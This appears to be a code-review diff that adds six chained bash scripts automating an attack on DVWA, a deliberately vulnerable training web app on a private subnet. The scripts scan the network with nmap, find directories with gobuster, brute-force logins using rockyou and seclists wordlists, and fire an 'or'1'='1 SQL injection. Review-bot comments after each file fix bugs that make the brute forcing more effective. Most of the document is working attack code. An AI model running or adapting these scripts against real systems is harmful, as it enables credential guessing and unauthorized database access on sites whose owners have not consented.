Showing
6 changed files
with
262 additions
and
0 deletions.
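--- a/bruteForce.sh
+++ b/bruteForce.sh
@@ -0,0 +1,71 @@
+#vulnId.sh --> bruteForce.sh
+
+echo -e "\n---- Starting Brute Force on brute vulnerability ----"
+sleep 3s
+
+## Variables
+LOGIN_URL=$LOGIN_URL
+BRUTE_DIR=$BRUTE_DIR
+#USER and PASS found from bruteLogin.sh
+DVWA_USER=$DVWA_USER
+DVWA_PASS=$DVWA_PASS
+
+#DVWA_USER='admin'
+#DVWA_PASS='password'
+
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt"
+
+## Value to look for in response in webpage source code
+SUCCESS="Welcome to the password protected area $DVWA_USER"
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+## Username loop
+while read -r _USER; do
+
+## Increase counter
+((i=i+1))
+
+## Display USER:PASS attempts to user
+#echo "Try ${i}: ${_USER} : ${_PASS}"
+
+## Connect to web server
+REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+## Check response against SUCCESS string
+echo "${REQUEST}" | grep -q "${SUCCESS}"
+if [[ "$?" -eq 0 ]]; then
+## Success!
+echo -e "\nFound at Try: ${i}"
+echo "Username: ${_USER}"
+echo "Password: ${_PASS}"
+
+#echo "${REQUEST}"
+echo "$SUCCESS"
+sleep 3s
+break 2
+fi
+
+done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+#rm -f /tmp/dvwa.cookie
+
+export COUNT=2
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh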
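Review bot: The candidate username and password in the request line `REQUEST="$( curl -sb 'security=low' ... "$BRUTE_DIR/?username=${_USER}&password=${_PASS}&Login=Login" )"` are spliced into the query string raw, so any rockyou entry containing `&`, `#`, `%`, `+` or a space is truncated or reinterpreted by the server and the real password is silently reported as a miss. Let curl do the encoding: `REQUEST="$( curl -sG -b 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie --data-urlencode "username=${_USER}" --data-urlencode "password=${_PASS}" --data-urlencode "Login=Login" "$BRUTE_DIR/" )"`. The login step only checks curl's transport status (`[[ "$?" -ne 0 ]]` after the `-d "username=..."` curl), so a rejected login is not detected and the whole loop then runs unauthenticated; capturing that response with `-si` and grepping for `Location: index.php`, as bruteLogin.sh does, before entering the loop would catch it. The commented-out `#rm -f /tmp/dvwa.cookie` also names the wrong path — the jar is `~/Documents/DVWA/scripts/dvwa.cookie` — so the authenticated session cookie is left on disk after the run.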
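--- a/bruteLogin.sh
+++ b/bruteLogin.sh
@@ -0,0 +1,60 @@
+#scanInit.sh --> bruteLogin.sh
+
+echo -e " \n---- Starting Brute force on Login Page ---- "
+
+## Variables
+export LOGIN_URL=$LOGIN_URL
+USER_LIST="/usr/share/seclists/Usernames/top-usernames-shortlist.txt"
+PASS_LIST="/usr/share/seclists/Passwords/rockyou.txt"
+export IP=$INIT_IP
+
+## Value to look for in response
+SUCCESS="Location: index.php"
+
+## Counter
+i=0
+
+## Password loop
+while read -r _PASS; do
+
+## Username loop
+while read -r _USER; do
+
+## Increase counter
+((i=i+1))
+
+## Display USER:PASS attempts to user
+## Comment out for less noise
+#echo "Try ${i}: ${_USER} : ${_PASS}"
+
+## Connect to web server
+CSRF=$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie $LOGIN_URL | awk -F 'value=' '/user_token/ {print $2}' | awk -F "'" '{print $2}' )
+
+REQUEST="$( curl -sib ~/Documents/DVWA/scripts/dvwa.cookie --data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login" $LOGIN_URL )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+## Check response against SUCCESS string
+echo "${REQUEST}" | grep -q "${SUCCESS}"
+if [[ "$?" -eq 0 ]]; then
+## Success!
+echo -e "\nFound at Try ${i}:\nUsername:${_USER}\nPassword:${_PASS}"
+sleep 3s
+
+#export credential variables to use in next script
+export USER="$(echo "${_USER}")"
+export PASS="$(echo "${_PASS}")"
+
+break 2
+fi
+
+done < ${USER_LIST}
+done < ${PASS_LIST}
+
+## Clean up
+rm -f ~/Documents/DVWA/scripts/dvwa.cookie
+
+#Create counter for next script
+export COUNT=1
+
+#Call next script
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh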
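Review bot: When no pair in the two lists succeeds, `USER`/`PASS` are never exported, yet the tail of the script still sets `export COUNT=1` and runs `/bin/bash ~/Documents/DVWA/scripts/vulnId.sh`, which launches bruteForce.sh with empty `DVWA_USER`/`DVWA_PASS`. Add a guard after the loops, `[[ -n "${PASS:-}" ]] || { echo '[!] No valid credentials found' >&2; exit 1; }` (test `PASS`, not `USER` — see next point). Exporting the hit under the names `USER` and `PASS` clobbers the login name that `$USER` already carries into every child process, so a `-n "$USER"` check would always pass; exporting as `DVWA_USER`/`DVWA_PASS`, which vulnId.sh copies into anyway, avoids the collision. The `--data "username=${_USER}&password=${_PASS}&user_token=${CSRF}&Login=Login"` body also sends rockyou entries unencoded, so passwords containing `&`, `%` or `+` are misread by the server and counted as misses; `--data-urlencode "password=${_PASS}"` per field fixes that.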
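--- a/init.sh
+++ b/init.sh
@@ -0,0 +1,18 @@
+##init.sh
+
+##Force no internet
+#nmcli networking off
+
+##Check for internet connection
+wget -q --spider http://google.com
+if [ $? -eq 0 ]; then
+echo "Online"
+echo -e "---- Starting Network scans ---- \n "
+/bin/bash ~/Documents/DVWA/scripts/scanInit.sh
+else
+echo "No network connection"
+echo "quitting"
+exit
+fi
+
+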
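Review bot: The failure branch ends with a bare `exit`, which returns the status of the preceding `echo "quitting"` — i.e. 0 — so a caller cannot tell "no connectivity, nothing scanned" from success; make it `exit 1`. The probe itself, `wget -q --spider http://google.com`, is a plaintext request to a third party, while every later stage targets a host in 192.168.40.0/24, so the gate checks internet reachability the pipeline never needs and beacons the operator's machine out before the engagement starts; pinging the lab subnet (or the target once known) would be the meaningful check. The `##Force no internet` / `#nmcli networking off` lines directly above contradict the check and should be removed or explained.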
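--- a/scanInit.sh
+++ b/scanInit.sh
@@ -0,0 +1,33 @@
+#init.sh --> scanInit.sh
+
+##Variables
+##export local IP
+#export INIT_IP=$(ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'
+
+#Get all IP's and HTTP ports on network
+nmap -T4 -Pn 192.168.40.141/24 | grep -E 'http|([0-9]{1,3}[\.]){3}[0-9]{1,3}' | grep -v https > tmp.txt
+
+#Get HTTP ip address
+export INIT_IP=$(cat tmp.txt | grep 'http' -B 1 | grep -Eo '([0-9]{1,3}[\.]){3}[0-9]{1,3}')
+#Get HTTP port
+HTTP_PORT=$(cat tmp.txt | grep http | sed 's/[^0-9]*//g')
+
+#rm tmp.txt
+
+#HTTP_PORT=80
+
+echo "IP address: $INIT_IP"
+echo "HTTP port number: $HTTP_PORT"
+export WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+
+#Create variable for the Login URL using the IP and open port number
+export LOGIN_URL=$(gobuster dir -u "$INIT_IP:$HTTP_PORT/DVWA/" -nqelw $WORD_LIST -x php | grep login | grep -o '^\S*')
+
+echo "Full Login URL: $LOGIN_URL"
+
+sleep 3s
+
+#Call next script (Brute Forcing the login page)
+/bin/bash ~/Documents/DVWA/scripts/bruteLogin.sh
+
+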
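Review bot: `INIT_IP` and `HTTP_PORT` are extracted with `grep -Eo` / `sed` over the whole nmap listing, so if more than one host on the hard-coded `192.168.40.141/24` answers on an http port (or one host exposes two), both variables become multi-line strings and `"$INIT_IP:$HTTP_PORT/DVWA/"` turns into a garbage URL for gobuster and for every script downstream. Fail early instead: `[[ $(wc -l <<<"$INIT_IP") -eq 1 && $(wc -l <<<"$HTTP_PORT") -eq 1 ]] || { echo '[!] Expected exactly one HTTP host/port' >&2; exit 1; }`. The scan output is also written to `tmp.txt` in whatever directory the script was launched from and only cleaned by a relative `rm tmp.txt` in vulnId.sh; a `mktemp` file with `trap 'rm -f -- "$tmp"' EXIT` keeps reconnaissance results from being left behind. The subnet should come from a variable or argument rather than a literal so the pipeline is not silently pointed at the wrong network.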
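--- a/sqli.sh
+++ b/sqli.sh
@@ -0,0 +1,43 @@
+#vulnId.sh --> sqli.sh
+
+#Variables
+#URL=$URL
+IP=$IP
+SQLI_DIR=$SQLI_DIR'/'
+SQLI_1=' or '1'='1
+EXT='?id=1&Submit=Submit'
+LOGIN_URL="http://192.168.40.145/DVWA/login.php/"
+DVWA_USER=$USER
+DVWA_PASS=$PASS
+
+#sqlmap -u "${SQLI_DIR}?id=&Submit=Submit" --cookie="PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj;security=low" --batch --drop-set-cookie
+
+## Anti CSRF token
+CSRF="$( curl -sc ~/Documents/DVWA/scripts/dvwa.cookie "$LOGIN_URL" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2 )"
+sed -i '/security/d' ~/Documents/DVWA/scripts/dvwa.cookie
+
+## Login to DVWA using cookie
+curl -sb ~/Documents/DVWA/scripts/dvwa.cookie -d "username=${DVWA_USER}&password=${DVWA_PASS}&user_token=${CSRF}&Login=Login" "$LOGIN_URL" >/dev/null
+[[ "$?" -ne 0 ]] && echo -e '\n[!] Issue connecting! #1' && exit 1
+
+## Connect to server using cookie
+REQUEST="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Display Success
+echo "${REQUEST}" | grep "Vulnerability: SQL Injection" | sed -e 's/^[ \t]*//'
+
+#Attempt SQLi with DVWA'or'1'='1
+echo -e "\n---- Attempting SQLi using DVWA'or'1'='1 ----\n"
+TEST1="$( curl -sb 'security=low' -b ~/Documents/DVWA/scripts/dvwa.cookie "${SQLI_DIR}?id=DVWA'or'1'='1&Submit=Submit" )"
+[[ $? -ne 0 ]] && echo -e '\n[!] Issue connecting! #2'
+
+#Format output
+echo "${TEST1}" | grep -o -P '(?<=pre).*(?=pre)' | sed -e 's/<br /\\\n/g' -e 's/pre><pre>/\\\n/g' -e 's/\\/ /g' -e 's/[/>]//g' -e 's/<//g'
+
+export COUNT=3
+
+/bin/bash ~/Documents/DVWA/scripts/vulnId.sh
+
+#Clean up
+#rm -r /root/.sqlmap/output/$IP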
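Review bot: `LOGIN_URL="http://192.168.40.145/DVWA/login.php/"` overwrites the `LOGIN_URL` that scanInit.sh discovered and vulnId.sh exported, so the CSRF fetch and login in this script go to a fixed host rather than the one the earlier stages found; `LOGIN_URL=$LOGIN_URL`, as bruteForce.sh does, keeps the pipeline consistent. The commented-out sqlmap line still carries a literal `PHPSESSID=96uqh3mj23mg50vnn2uadsj5rj` — a session identifier should not be committed even inside a comment; delete it or use a placeholder. The first request puts the credentials in the query string (`"${SQLI_DIR}?username=${DVWA_USER}&password=${DVWA_PASS}&Login=login${EXT}"`), which lands them in the server access log and any intermediate proxy; once the session cookie is set, `"${SQLI_DIR}${EXT}"` is all that is needed to reach the page. `SQLI_1=' or '1'='1` is unused and, because of how the quotes pair up, actually holds ` or 1=1`.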
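--- a/vulnId.sh
+++ b/vulnId.sh
@@ -0,0 +1,37 @@
+#bruteLogin.sh --> vulnId.sh
+#bruteForce.sh --> vulnId.sh
+
+##Variables
+#export URL="http://192.168.40.145/DVWA/vulnerabilities"
+WORD_LIST="/usr/share/dirb/wordlists/common.txt"
+EXT="/DVWA/vulnerabilities"
+COUNT=$COUNT
+#export COUNT=$COUNT
+export DVWA_USER=$USER
+export DVWA_PASS=$PASS
+export LOGIN_URL=$LOGIN_URL
+export IP=$IP
+
+case $COUNT in
+1)
+#dirb on DVWA home page to find brute vulnerability directory
+echo -e "\n---- Finding brute force directory ----\n"
+export BRUTE_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/brute ' | grep -o '^\S*')
+echo -e "Directory with brute vulnerability: $BRUTE_DIR"
+sleep 5s
+/bin/bash ~/Documents/DVWA/scripts/bruteForce.sh
+;;
+2)
+#find sqli vulnerability directory
+echo -e "\n---- Finding SQL injection directory ----\n"
+export SQLI_DIR="http://"$IP$EXT$(gobuster dir -u 'http://'$IP$EXT -w $WORD_LIST | grep '/sqli ' | grep -o '^\S*')
+echo -e "Directory with sqli vulnerability: $SQLI_DIR \n"
+sleep 5s
+/bin/bash ~/Documents/DVWA/scripts/sqli.sh
+;;
+3)
+rm tmp.txt
+rm dvwa.cookie
+;;
+*)
+esac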
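Review bot: The cleanup arm `3)` removes `tmp.txt` and `dvwa.cookie` by relative path, but the cookie jar every other script writes is `~/Documents/DVWA/scripts/dvwa.cookie` (and `tmp.txt` is created in scanInit.sh's working directory), so unless the pipeline happens to be launched from that directory the `rm` fails and the authenticated DVWA session cookie stays on disk; use `rm -f -- ~/Documents/DVWA/scripts/dvwa.cookie` plus the absolute path of the scan output. In arms `1)` and `2)`, when gobuster finds no `/brute ` or `/sqli ` entry the command substitution is empty and `BRUTE_DIR`/`SQLI_DIR` silently collapse to `http://$IP/DVWA/vulnerabilities`, so the next script hammers the wrong URL; capture the substitution in a variable and check `[[ -n "$found" ]]` before exporting and calling on. `$IP$EXT` and `$WORD_LIST` are unquoted in both gobuster invocations; quoting them is cheap. The `*)` arm is empty, so an unexpected `COUNT` exits 0 with no message — a one-line `echo "[!] Unknown stage: $COUNT" >&2; exit 1` makes that visible.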